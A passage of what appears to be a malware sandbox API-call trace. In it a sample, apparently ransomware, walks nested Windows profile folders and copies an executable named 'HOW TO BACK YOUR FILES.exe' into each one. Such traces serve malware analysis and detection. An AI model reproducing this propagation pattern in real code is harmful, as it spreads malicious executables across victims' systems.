ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.689] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.689] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.689] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.689] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.689] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.690] GetLastError () returned 0x0 [0042.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.690] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.690] CloseHandle (hObject=0x118) returned 1 [0042.690] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.690] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.690] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.690] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.690] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.690] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.691] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.691] GetLastError () returned 0x0 [0042.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.691] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.691] CloseHandle (hObject=0x118) returned 1 [0042.692] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.692] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.692] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.692] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.692] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.692] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.693] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.693] GetLastError () returned 0x0 [0042.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.693] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.693] CloseHandle (hObject=0x118) returned 1 [0042.693] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.693] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.694] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.694] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.694] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.694] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.694] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.694] GetLastError () returned 0x0 [0042.694] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.694] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.695] CloseHandle (hObject=0x118) returned 1 [0042.695] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.695] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.695] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.695] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.695] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.695] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.696] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.696] GetLastError () returned 0x0 [0042.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.696] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.696] CloseHandle (hObject=0x118) returned 1 [0042.696] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.696] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.696] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.696] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.696] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.696] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.697] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.697] GetLastError () returned 0x0 [0042.697] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.697] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.697] CloseHandle (hObject=0x118) returned 1 [0042.697] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.697] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.698] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.698] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.698] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.698] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.698] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.698] GetLastError () returned 0x0 [0042.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.698] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.699] CloseHandle (hObject=0x118) returned 1 [0042.699] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.699] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.699] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0042.699] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0042.699] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.699] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.700] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.700] GetLastError () returned 0x0 [0042.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.700] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.700] CloseHandle (hObject=0x118) returned 1 [0042.700] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.700] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.700] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local 